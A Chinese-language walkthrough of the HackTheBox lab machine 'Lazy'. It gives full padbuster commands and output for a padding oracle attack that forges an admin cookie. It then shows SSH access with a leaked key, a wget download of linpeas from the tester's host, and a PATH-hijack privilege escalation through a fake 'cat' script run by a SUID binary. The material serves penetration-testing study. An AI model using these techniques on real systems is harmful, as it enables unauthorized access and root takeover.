冬萍子
冬萍子

hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )

1 扫描

常规,22想到可能有ssh登录,80进web搜集信息

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
|   2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
|   256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_  256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev

2 web信息搜集

进去注册号,登录,没价值发现
前端源码ctrl+u,没价值发现
dirbuster扫目录,没价值发现。
下载图片strings看看,没价值发现。
怀疑端口是否扫描全,重新全端口扫描,没价值发现。。
猜弱口令,没价值发现
sql注入,没价值发现。。。

是不是很捉急。。
这种情况再burp打开,抓包看看有没什么发现。
再没价值发现,那也不知道怎么搞了,只能去看别人写的wp。。

通过网站注册个号,然后登录
抓到有个auth的cookie
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第1张图片
我改一改auth,再重新发送,显示invalid padding
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第2张图片

这个叫Padding oracle attack。网上有很多科普,密码学的东西,感觉看不懂的话就用Padbuster这个工具就行了
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第3张图片

3 Padbuster

没有的话apt安装
命令参考这个,blocksize先试8,默认encoding 0 。 然后输进burp里的auth值
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第4张图片
中间要求输入的话,按提示输入推荐的,我的是2
就读出了我之前注册的用户

命令 padbuster http://10.10.10.18/login.php LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI 8 -cookies auth=LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI -encoding 0

C:\root> padbuster http://10.10.10.18/login.php LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI  8 -cookies auth=LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI -encoding 0

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 1486

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       200     1564    N/A
2 **    255     200     15      N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (73/256) [Byte 8]
[+] Success: (138/256) [Byte 7]
[+] Success: (139/256) [Byte 6]
[+] Success: (56/256) [Byte 5]
[+] Success: (194/256) [Byte 4]
[+] Success: (124/256) [Byte 3]
[+] Success: (201/256) [Byte 2]
[+] Success: (173/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): a6b3b4c5f1920eff
[+] Intermediate Bytes (HEX): 5b30823bcc7674b6
[+] Plain Text: user=pkp

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***

[+] Success: (10/256) [Byte 8]
[+] Success: (252/256) [Byte 7]
[+] Success: (103/256) [Byte 6]
[+] Success: (3/256) [Byte 5]
[+] Success: (56/256) [Byte 4]
[+] Success: (70/256) [Byte 3]
[+] Success: (68/256) [Byte 2]
[+] Success: (90/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): 09492bce902acb88
[+] Intermediate Bytes (HEX): aebbbccdf99a06f7
[+] Plain Text: 

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): user=pkp

[+] Decrypted value (HEX): 757365723D706B700808080808080808

[+] Decrypted value (Base64): dXNlcj1wa3AICAgICAgICA==

-------------------------------------------------------

C:\root>

第二次运行我加上-plaintext user=admin读admin的cookie auth

C:\root> padbuster http://10.10.10.18/login.php LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI  8 -cookies auth=LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI -encoding 0 -plaintext user=admin

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 1486

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       200     1564    N/A
2 **    255     200     15      N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (196/256) [Byte 8]
[+] Success: (148/256) [Byte 7]
[+] Success: (92/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (218/256) [Byte 4]
[+] Success: (136/256) [Byte 3]
[+] Success: (150/256) [Byte 2]
[+] Success: (190/256) [Byte 1]

Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d

[+] Success: (1/256) [Byte 8]
[+] Success: (36/256) [Byte 7]
[+] Success: (180/256) [Byte 6]
[+] Success: (17/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (50/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
[+] Success: (135/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------

C:\root>

拿到BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA

我记得kali2018已经安装好了改cookie插件。但kali2020怎么找不到了。我在我的火狐浏览器。搜改cookie插件,搜到cookie quick manager
先用我原来注册的号登进去
然后点击改cookie插件,选择10.10.10.18,在auth那里进行修改,换上admin的,底下点保存。
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第5张图片
再我之前的已登录的界面点击刷新。就自动刷进管理员的了。因为cookie已经换了。
看到key,点进去,是ssh登录信息。
而且网址那里写了用户名,否则不知道登到哪里去。。
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第6张图片

下载下来,进行登录,先chmod 600。登录成功。

C:\root\htb\lazy> chmod 600 id_rsa 

C:\root\htb\lazy> ssh -i id_rsa mitsos@10.10.10.18
The authenticity of host '10.10.10.18 (10.10.10.18)' can't be established.
ECDSA key fingerprint is SHA256:OJ5DTyZUGZXEpX4BKFNTApa88gR/+w5vcNathKIPcWE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.18' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun May 24 07:19:39 EEST 2020

  System load: 0.0               Memory usage: 5%   Processes:       193
  Usage of /:  7.6% of 18.58GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Thu Jan 18 10:29:40 2018
mitsos@LazyClown:~$ cd /tmp

mitsos@LazyClown:/tmp$ wget http://10.10.14.43/linpeas.sh
--2020-05-24 09:49:53--  http://10.10.14.43/linpeas.sh
Connecting to 10.10.14.43:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 159864 (156K) [text/x-sh]
Saving to: ‘linpeas.sh’

100%[================================================================================>] 159,864     69.9KB/s   in 2.2s   

2020-05-24 09:49:56 (69.9 KB/s) - ‘linpeas.sh’ saved [159864/159864]

mitsos@LazyClown:/tmp$ chmod 777 linpeas.sh 
mitsos@LazyClown:/tmp$ ./linpeas.sh

4 提权

老套路,linpeas自动扫
看到版本标颜色了,应该可以ubantu版本提权。
不过我又看了下别的
suid是给予了root权限干活,看到了用户目录下有这个也在suid里
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第7张图片
运行看看是啥,结果显示了/etc/shadow的内容,linux基础知识掌握了就知道这个是/etc/shadow
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第8张图片
cat看看内容是啥,一堆乱码。。
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第9张图片
strings再看看结构
果然是cat查看

hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第10张图片

既然是root在执行,我能否改掉cat,伪造一个cat,里面放进提权内容。然后root执行这个backup时,按流程走到cat时,其实就执行我的假cat,完成提权。

查cat的位置。在bin。而查看环境变量里echo $PATH,bin在后面,因此执行cat,最先开始其实是从/usr/local/sbin里搜的,搜不到就往后,直到bin里搜到cat。才执行
在这里插入图片描述

如果我们有/usr/local/sbin的写的权限就好了,就像这台靶机writeup是这个思路。可以直接在里面写个假cat,但是这台lazy靶机没有。

换个思路,改环境变量提权
我进入/tmp,因为这个目录我们有写的权限。
在这里造假cat,nano echo或者vi都可以。我习惯用nano
内容就是提权给shell

#!/bin/sh
/bin/sh

然后再赋予执行权 chmod 777
接着,我把tmp目录,在环境变量里加到/usr/local/sbin之前。export PATH=/tmp:$PATH
这个时候再查看环境变量,可以看到顺序就不一样了
在这里插入图片描述

现在执行/home/mitsos/backup。因此root执行到cat命令时,会在环境里搜,先搜的是tmp里的,搜到就开始执行。所以其实执行的不是真cat,而是我们狸猫换太子的假cat,因此提权。
成功拿下root。
当然此时再去看root.txt,就不要用cat查看,因为此cat已非彼cat。改用strings
hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )_第11张图片

你可能感兴趣的:(hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 ))

  • 风险管理和采购管理核心考点梳理 WorkLee PMPPMP风险管理采购管理
    个人总结,仅供参考,欢迎加好友一起讨论PMP-风险管理和采购管理核心考点梳理风险管理风险是一个中性词,包括机会和威胁。风险管理的子过程非常多,但是相对来说子过程之间的逻辑非常清晰,整个风险管理的过程都是在维护一个非常重要的工件-风险登记册。风险管理是项目管理全生命周期都要开展的。1)规划风险管理风险管理计划包含哪些内容?解析:风险管理计划是描述如何安排与实施风险管理活动。(风险管理计划中无风险)包
  • 沟通管理和相关方管理核心考点梳理 WorkLee PMPPMP沟通管理相关方干系人
    个人总结,仅供参考,欢迎加好友一起讨论PMP-沟通管理和相关方管理核心考点梳理沟通管理和相关方(干系人)管理这两章放在一起进行梳理,这两章很多的考点很容易混淆,经常会纠结于一些题目,究竟选择沟通管理还是干系人管理的知识点。沟通管理1)规划沟通管理沟通在PMP中是指信息流的传递,PM是根据谁的需求来确定这种信息流的传递方式、频率,内容、格式呢?解析:规划沟通管理是基于每个相关方或相关方群体的信息需求
  • SQL运维_Unix下MySQL-8.0.18配置文件示例 Mostcow SQLsql运维unix
    SQL运维_Unix下MySQL-8.0.18配置文件示例MySQL是一个关系型数据库管理系统,由瑞典MySQLAB公司开发,属于Oracle旗下产品。MySQL是最流行的关系型数据库管理系统之一,在WEB应用方面,MySQL是最好的RDBMS(RelationalDatabaseManagementSystem,关系数据库管理系统)应用软件之一。MySQL是一种关系型数据库管理系统,关系数据库将
  • 【笔试】银行校招,信息科技岗 & 金融科技岗笔试准备方向 小哈里 就业科技金融春招笔试银行
    【笔试】银行校招,信息科技&金融科技岗笔试准备方向文章目录1、银行招聘流程(投递)2、笔试内容分析(笔试)3、真题题库(BOC)3.1职业能力(行测)3.2英语3.3信息科技1、银行招聘流程(投递)一般银行面试流程分为以下几步:网上提交简历(内容非常多,没有PDF,全部表单)笔试(全国统一,线下考点)一面(偏技术面)二面(无领导面试、半结构化面试)体检签约会简历:通常银行的要填写的简历内容非常多,
  • Linux中PATH、LIBRARY_PATH、LD_LIBRARY_PATH的作用 zhang-ge LinuxClinux
    1、PATHPATH是存储可执行文件搜索路径的系统环境变量,它包含了一组由冒号:分隔的目录列表。当运行一个命令时,操作系统会在这些目录中查找相应的可执行文件,并在找到后执行它。例如,在命令行中执行ls命令时,就会依次在PATH变量列出的目录中查找ls命令,如果找到则执行,否则会提示找不到该命令。可以通过以下方式修改PATH环境变量:exportPATH=$PATH:/exe_path/bin永久修
  • linux环境下 python import找不到自定义模块的解决方法 强哥的博客 python
    问题现象:Linux环境中自定义的模块basic,importbasic出错。basic模块在/quoteEastmoney/目录下。两种方法:1.在导入模块之前(每个.py文件都需要加)importsyssys.path.append('/quoteEastmoney/')2.更改环境变量(一次修改永久生效)管理员权限修改:/etc/profile。在最后一行加上exportPYTHONPATH
  • uniapp 开发微信小程序 出现启用组件按需注入问题如何解决 古猿写代码 uniappuni-app微信小程序小程序
    问题描述在使用uniapp开发微信小程序,进行上架发布时代码质量栏出现启用组件按需注入问题。虽然现实代码上传成功,但是作为一个吹毛求疵的老猿人,肯定是无法容忍的。那么如何解决呢?问题解决方案在uniapp端,特别注意不是在微信开发工具端,找到unpackage包,在下面找到app.json文件。在app.json文件中,加入一下代码://解决启用组件按需注入问题"lazyCodeLoading":
  • 2021-11-13 cd93761a1cef
    本文并不完全遵循原文翻译,对部分内容自己也做了解释补充。Narrowing试想我们有这样一个函数,函数名为padLeft:functionpadLeft(padding:number|string,input:string):string{thrownewError("Notimplementedyet!");}该函数实现的功能是:如果参数padding是一个数字,我们就在input前面添加同等数
  • Linux .bashrc .bash_profile 和 .profile之间的区别 zoutao98 Linuxbashlinux开发语言
    1概述bashshell使用一些启动文件去设置环境变量,这些启动文件为shell本身和系统用户确定某些bashshell配置,在本文中,我们将了解.bashrc.bash-profile和.profile之间的区别。2交互式和非交互式shellBash在交互式shell中提供了两种模式选项,登录和非登录(loginandnon-login)。当我们使用ssh登录到系统时,我们得到一个交互式登录的s
  • MySQL Enterprise Backup (MEB) for MySQL 8.0 深入解析及企业级备份恢复演练 lzyever MySQLmysql数据库
    一、备份恢复核心概念MEB简介MySQLEnterpriseBackup是Oracle提供的专业物理备份工具,专为MySQL8.0及以后版本设计,提供高效且低干扰的在线备份解决方案。它能够实现对InnoDB存储引擎数据的快速备份,并兼容MySQL的诸多高级特性。主要特点在线热备份:MEB在备份期间尽可能减少对数据库活动的阻塞,采用多线程技术并结合InnoDB的元组锁定机制,创建一致性备份。增量备份
  • docker构建镜像命令 你是理想 dockerdocker容器运维
    编写dockerfile文件例子1;FROMoraclelinux:7-slimENVrelease=19ENVupdate=13RUNcurl-o/etc/yum.repos.d/public-yum-ol7.repohttps://yum.oracle.com/public-yum-ol7.repo&&\yum-config-manager--enableol7_oracle_instantc
  • 【笔记】HDFS基础笔记 哇咔咔哇咔 Hadoophdfs笔记hadoop大数据ubuntu
    启动hadoop命令(未配环境变量):进入hadoop安装目录输入./sbin/start-dfs.sh已配环境变量:start-dfs.sh关闭hadoop命令:stop-dfs.sh启动完成后,可以通过命令jps来判断是否成功启动,若成功启动则会列出如下进程:"NameNode"、"DataNode"和"SecondaryNameNode"三种Shell命令方式:1.hadoopfs2.had
  • Mac 配置环境变量和处理路径中空格 lsq126yx macospython开发语言
    在终端中设置临时环境变量,使用export命令可以在当前的终端会话中设置临时环境变量。例如,要设置JAVA_HOME环境变量,可以执行以下命令:exportJAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_201.jdk/Contents/Home这样在当前终端会话中,JAVA_HOME环境变量就被设置为指定的路径了。在用户目录下设置永久环境
  • Oracle 物化视图 博弈星宇 Oracleoracle数据库database
    物化视图也是种视图。Oracle的物化视图是包括一个查询结果的数据库对像,它是远程数据的本地副本,或者用来生成基于数据表求和的汇总表。物化视图存储基于远程表的数据,也可以称为快照。物化视图可以查询表,视图和其它的物化视图。特点:(1)物化视图在某种意义上说就是一个物理表(而且不仅仅是一个物理表),这通过其可以被user_tables查询出来,而得到确认;(2)物化视图也是一种段(segment),
  • 联级选择联级选择 dongsdh vue.jselementuijavascript
    areaList:[],props:{lazy:true,label:"shortName",value:"id",lazyLoad(node,resolve){letnodes=[];if(node.level==1){getListCityList(node.value).then((res)=>{nodes=res.dataresolve(nodes);})}elseif(node.leve
  • ubuntu20.04下安装anaconda+配置环境变量+运行+创建快捷方式 Terry Cao 漕河泾 ubuntulinux
    原来是在windows下用matlab进行数据处理与算法验证,在ubuntu下进行C++部署应用,需要不断的重启切换双系统,太麻烦,打算在ubuntu下用python进行数据处理与算法验证。安装anaconda如下1.官网下载anacondaFreeDownload|Anaconda2.安装,在文件夹下打开命令窗口,输入bashAnaconda3-2022.10-Linux-x86_64.sh具体
  • 2021-12-21 ziatan
    青龙openAPI非官方文档前言:之前预告发一个小工具,本来后端部分已经写完,在本地测试成功,但是搬到服务器就出现错误,再加上沉迷游戏,先鸽了。授人以鱼不如授人以渔,发个openapi使用说明,应该有人需要,其实看青龙的源码也能看明白,这里以环境变量的api为例,抛砖引玉了。官方源码:https://github.com/whyour/qinglong/blob/develop/back/api/
  • 唯一约束 橙子味冰可乐 Oracle从小白到总裁数据库oraclesql开发语言java
    Oracle从入门到总裁:https://blog.csdn.net/weixin_67859959/article/details/135209645唯一约束唯一约束的特点是在某一个列上的内容不允许出现重复。例如,现在要收集用户的信息,假设包含编号(mid)、姓名(name)、E-mail(email)很明显email的数据不可能重复,所以就可以使用unique约束完成--删除数据表dropta
  • JDBC的概念 2301_79744036 数据库java
    一.JDBC概念:其实JDBC就像是翻译官,就像是你去到国外是不是听不懂当地人再讲什么?Java就相当于是你,数据库就是本地人,然后JDBC就是那个翻译官,它提供了一套标准的方法和工具,让Java程序可以与各种不同类型的数据库进行交流,无论是MySQL、Oracle、SQLServer还是其他类型的数据库。它隐藏了与具体数据库相关的细节,使得Java程序员可以用相同的方式来访问不同的数据库,而不需
  • 详细说说JVM的class文件(一) Benaso JVMjvm
    介绍class虚拟机实现可以从文件系统(环境变量)读取也可以从JAR(或者ZIP)包提取,也可以从网上下载,从数据库加载,甚至在运行中直接生成class文件。文件由8位字节流组成。16位和32位的数量分别通过读入两个和四个连续的8位字节来构造。多字节数据项总是以大端顺序存储,其中高字节放在前面。结构文件由单个结构组成:classClassFileClassFile{u4magic;u2minor_
  • 国考综合每日一题2020.2.25 庐陵鹿鸣君
    本题节选自国考2017年真题单选第六题低机会、低威胁的业务被称为()A.理想业务B.冒险业务C.成熟业务D.困难业务【正确答案】C【所属学科】《市场营销》第三章,市场营销环境分析。【难易程度】容易【考点解析】企业在分析市场营销环境时,企业的最高管理层可以用“环境威胁矩阵图”和“市场机会矩阵图”来分析、评价。环境威胁矩阵图的纵列代表“出现威胁的可能性”,横排代表“潜在的严重性”,表示盈利减少的程度。
  • 使用JavaScript写拖拽案例 诶呦我那个暴脾气 前端前端拖拽案例JavaScript
    //设置HTML标签中的css样式。//用全局选择器(*)把HTML中的默认样式去掉。//设置一个拖拽用的div盒子。使用绝对定位。css代码:*{margin:0;padding:0;list-style:none;}#box{width:100px;height:100px;background-color:hotpink;position:absolute;cursor:move;}HTML
  • 如何用Jmeter对数据库执行压力测试 自动化测试薰儿 软件测试技术分享jmeter数据库压力测试
    在我看来压力测试的压测对象可以分为UI,接口及数据库三个部分吧,对界面及接口进行压测还算熟悉,定位性能瓶颈,对数据库SQL执行压测也是需要做的。工具呢?还是Jmeter1、将需要用到的链接Oracle的架包放到jmeter中在数据库服务器安装路径下,找到ojdbc5.jar,D:\app\Administrator\product\11.2.0\dbhome_1\jdbc\lib拷贝到jmeter
  • linux安装单机版spark3.5.0 爱上雪茄 大数据JAVA知识spark大数据分布式
    一、spark介绍是一种通用的大数据计算框架,正如传统大数据技术Hadoop的MapReduce、Hive引擎,以及Storm流式实时计算引擎等.Spark主要用于大数据的计算二、spark下载spark3.5.0三、spark环境变量配置exportJAVA_HOME=/usr/local/jdk1.8.0_391exportJRE_HOME=/usr/local/jdk1.8.0_391/jr
  • Docker镜像构建(docker build命令、Dockerfile) 云川之下 dockerk8spaasdockerjava分布式
    文章目录1.简介2.Dockerfile介绍2.1语法规则2.2环境变量引用2.3dockerbuild命令2.4快速开始3.指令详解FROMLABELMAINTAINER(deprecated)COPYWORKDIRENVRUNEXPOSEVOLUMECMDENTRYPOINTUSERSTOPSIGNALHEALTHCHECKSHELLARGONBULD4使用multi-stage命名stage
  • Spring之底层架构核心概念解析 liushaojiax springjava
    BeanDefinitionBeanDefinition表示Bean定义,BeanDefinition中存在很多属性用来描述一个Bean的特点。比如:class,表示Bean类型scope,表示Bean作用域,单例或原型等lazyInit:表示Bean是否是懒加载initMethodName:表示Bean初始化时要执行的方法destroyMethodName:表示Bean销毁时要执行的方法还有很多
  • 一个简单的微信小程序表单提交样式模板 w宇宙王 微信小程序小程序
    没什么东西,只是方便自己直接复制使用.wxml姓名:学校:职位选择:提交.,scss.box{padding:30rpx;}.form-item{display:flex;background-color:rgb(221,230,230);margin-bottom:10rpx;border-radius:30rpx;}.head{line-height:100rpx;margin-left:30
  • Hibernate的Criteria查询因某个字段为空,导致查询数据为空问题 clk_esunny 随笔javahibernatejava查询
    今天,使用Hibernate的Criteria查询Oracle数据库表数据,发现只要表里面某个字段为空,查询不出来数据,这是为什么呢?下面解决方法介绍一下:(下面的表User_Info,只是举例说明使用)一、查找原因,排除法(1)是不是这个Criteria查询方法不支持?a.采用普通的Hibernate查询QueryqyeryObj=session.createQuery("FROMUSER_IN
  • Oracle数据库体系结构简介 腾科教育 oracleoracle数据库
    Oracle数据库是一种功能强大且广泛使用的关系数据库管理系统(RDBMS)。为了更好地理解和使用Oracle数据库,了解其体系结构是至关重要的。本文将简要介绍Oracle数据库的体系结构,以便读者能够对其工作原理有一个基本的了解。一、实例(Instance)和数据库(Database):Oracle数据库由两个主要组成部分组成:实例和数据库。实例是在计算机内存中运行的Oracle进程集合,负责管
  • oracle底层原理 编织幻境的妖 oracle数据库
    1.请解释Oracle数据库的体系结构,包括实例和数据库之间的关系。Oracle数据库的体系结构可以分为内存结构、进程结构和存储结构三个主要部分,其中实例和数据库是两个核心概念。具体分析如下:内存结构:主要由两部分组成,SGA(系统全局区)和PGA(进程全局区)。SGA是一组共享的内存结构,包含数据库缓存、共享池等,用于提高数据库的性能和效率。PGA是非共享的内存区域,每个服务器进程都有自己的PG
  • ASM系列四 利用Method 组件动态注入方法逻辑 lijingyao8206 字节码技术jvmAOP动态代理ASM
            这篇继续结合例子来深入了解下Method组件动态变更方法字节码的实现。通过前面一篇,知道ClassVisitor 的visitMethod()方法可以返回一个MethodVisitor的实例。那么我们也基本可以知道,同ClassVisitor改变类成员一样,MethodVIsistor如果需要改变方法成员,注入逻辑,也可以
  • java编程思想 --内部类 百合不是茶 java内部类匿名内部类
    内部类;了解外部类 并能与之通信 内部类写出来的代码更加整洁与优雅   1,内部类的创建  内部类是创建在类中的 package com.wj.InsideClass; /* * 内部类的创建 */ public class CreateInsideClass { public CreateInsideClass(
  • web.xml报错 crabdave web.xml
    web.xml报错   The content of element type "web-app" must match "(icon?,display-  name?,description?,distributable?,context-param*,filter*,filter-mapping*,listener*,servlet*,s
  • 泛型类的自定义 麦田的设计者 javaandroid泛型
       为什么要定义泛型类,当类中要操作的引用数据类型不确定的时候。 采用泛型类,完成扩展。   例如有一个学生类     Student{ Student(){ System.out.println("I'm a student....."); } }  有一个老师类  
  • CSS清除浮动的4中方法 IT独行者 JavaScriptUIcss
    清除浮动这个问题,做前端的应该再熟悉不过了,咱是个新人,所以还是记个笔记,做个积累,努力学习向大神靠近。CSS清除浮动的方法网上一搜,大概有N多种,用过几种,说下个人感受。 1、结尾处加空div标签 clear:both 1 2 3 4 .div 1 { background : #000080 ; border : 1px   s
  • Cygwin使用windows的jdk 配置方法 _wy_ jdkwindowscygwin
    1.[vim /etc/profile]    JAVA_HOME="/cgydrive/d/Java/jdk1.6.0_43"  (windows下jdk路径为D:\Java\jdk1.6.0_43)    PATH="$JAVA_HOME/bin:${PATH}"    CLAS
  • linux下安装maven 无量 mavenlinux安装
    Linux下安装maven(转) 1.首先到Maven官网 下载安装文件,目前最新版本为3.0.3,下载文件为 apache-maven-3.0.3-bin.tar.gz,下载可以使用wget命令; 2.进入下载文件夹,找到下载的文件,运行如下命令解压 tar -xvf  apache-maven-2.2.1-bin.tar.gz 解压后的文件夹
  • tomcat的https 配置,syslog-ng配置 aichenglong tomcathttp跳转到httpssyslong-ng配置syslog配置
    1) tomcat配置https,以及http自动跳转到https的配置     1)TOMCAT_HOME目录下生成密钥(keytool是jdk中的命令)      keytool -genkey -alias tomcat -keyalg RSA -keypass changeit -storepass changeit
  • 关于领号活动总结 alafqq 活动
    关于某彩票活动的总结 具体需求,每个用户进活动页面,领取一个号码,1000中的一个; 活动要求 1,随机性,一定要有随机性; 2,最少中奖概率,如果注数为3200注,则最多中4注 3,效率问题,(不能每个人来都产生一个随机数,这样效率不高); 4,支持断电(仍然从下一个开始),重启服务;(存数据库有点大材小用,因此不能存放在数据库) 解决方案 1,事先产生随机数1000个,并打
  • java数据结构 冒泡排序的遍历与排序 百合不是茶 java
    java的冒泡排序是一种简单的排序规则   冒泡排序的原理:           比较两个相邻的数,首先将最大的排在第一个,第二次比较第二个 ,此后一样;         针对所有的元素重复以上的步骤,除了最后一个     例题;将int array[]
  • JS检查输入框输入的是否是数字的一种校验方法 bijian1013 js
    如下是JS检查输入框输入的是否是数字的一种校验方法: <form method=post target="_blank"> 数字:<input type="text" name=num onkeypress="checkNum(this.form)"><br> </form>
  • Test注解的两个属性:expected和timeout bijian1013 javaJUnitexpectedtimeout
    JUnit4:Test文档中的解释:   The Test annotation supports two optional parameters.   The first, expected, declares that a test method should throw an exception.   If it doesn't throw an exception or if it
  • [Gson二]继承关系的POJO的反序列化 bit1129 POJO
    父类     package inheritance.test2; import java.util.Map; public class Model { private String field1; private String field2; private Map<String, String> infoMap
  • 【Spark八十四】Spark零碎知识点记录 bit1129 spark
    1. ShuffleMapTask的shuffle数据在什么地方记录到MapOutputTracker中的 ShuffleMapTask的runTask方法负责写数据到shuffle map文件中。当任务执行完成成功,DAGScheduler会收到通知,在DAGScheduler的handleTaskCompletion方法中完成记录到MapOutputTracker中  
  • WAS各种脚本作用大全 ronin47 WAS 脚本
       http://www.ibm.com/developerworks/cn/websphere/library/samples/SampleScripts.html    无意中,在WAS官网上发现的各种脚本作用,感觉很有作用,先与各位分享一下     获取下载 这些示例 jacl 和 Jython 脚本可用于在 WebSphere Application Server 的不同版本中自
  • java-12.求 1+2+3+..n不能使用乘除法、 for 、 while 、 if 、 else 、 switch 、 case 等关键字以及条件判断语句 bylijinnan switch
    借鉴网上的思路,用java实现: public class NoIfWhile { /** * @param args * * find x=1+2+3+....n */ public static void main(String[] args) { int n=10; int re=find(n); System.o
  • Netty源码学习-ObjectEncoder和ObjectDecoder bylijinnan javanetty
    Netty中传递对象的思路很直观: Netty中数据的传递是基于ChannelBuffer(也就是byte[]); 那把对象序列化为字节流,就可以在Netty中传递对象了 相应的从ChannelBuffer恢复对象,就是反序列化的过程 Netty已经封装好ObjectEncoder和ObjectDecoder 先看ObjectEncoder ObjectEncoder是往外发送
  • spring 定时任务中cronExpression表达式含义 chicony cronExpression
    一个cron表达式有6个必选的元素和一个可选的元素,各个元素之间是以空格分隔的,从左至右,这些元素的含义如下表所示: 代表含义            是否必须 允许的取值范围         &nb
  • Nutz配置Jndi ctrain JNDI
    1、使用JNDI获取指定资源: var ioc = { dao : { type :"org.nutz.dao.impl.NutDao", args : [ {jndi :"jdbc/dataSource"} ] } } 以上方法,仅需要在容器中配置好数据源,注入到NutDao即可.
  • 解决 /bin/sh^M: bad interpreter: No such file or directory daizj shell
    在Linux中执行.sh脚本,异常/bin/sh^M: bad interpreter: No such file or directory。   分析:这是不同系统编码格式引起的:在windows系统中编辑的.sh文件可能有不可见字符,所以在Linux系统下执行会报以上异常信息。 解决: 1)在windows下转换: 利用一些编辑器如UltraEdit或EditPlus等工具
  • [转]for 循环为何可恨? dcj3sjt126com 程序员读书
      Java的闭包(Closure)特征最近成为了一个热门话题。 一些精英正在起草一份议案,要在Java将来的版本中加入闭包特征。 然而,提议中的闭包语法以及语言上的这种扩充受到了众多Java程序员的猛烈抨击。 不久前,出版过数十本编程书籍的大作家Elliotte Rusty Harold发表了对Java中闭包的价值的质疑。 尤其是他问道“for 循环为何可恨?”[http://ju
  • Android实用小技巧 dcj3sjt126com android
    1、去掉所有Activity界面的标题栏   修改AndroidManifest.xml   在application 标签中添加android:theme="@android:style/Theme.NoTitleBar"   2、去掉所有Activity界面的TitleBar 和StatusBar    修改AndroidManifes
  • Oracle 复习笔记之序列 eksliang Oracle 序列sequenceOracle sequence
    转载请出自出处:http://eksliang.iteye.com/blog/2098859 1.序列的作用 序列是用于生成唯一、连续序号的对象 一般用序列来充当数据库表的主键值 2.创建序列语法如下:   create sequence s_emp start with 1 --开始值 increment by 1 --増长值 maxval
  • 有“品”的程序员 gongmeitao 工作
    完美程序员的10种品质     完美程序员的每种品质都有一个范围,这个范围取决于具体的问题和背景。没有能解决所有问题的   完美程序员(至少在我们这个星球上),并且对于特定问题,完美程序员应该具有以下品质:   1. 才智非凡- 能够理解问题、能够用清晰可读的代码翻译并表达想法、善于分析并且逻辑思维能力强   (范围:用简单方式解决复杂问题)  
  • 使用KeleyiSQLHelper类进行分页查询 hvt sql.netC#asp.nethovertree
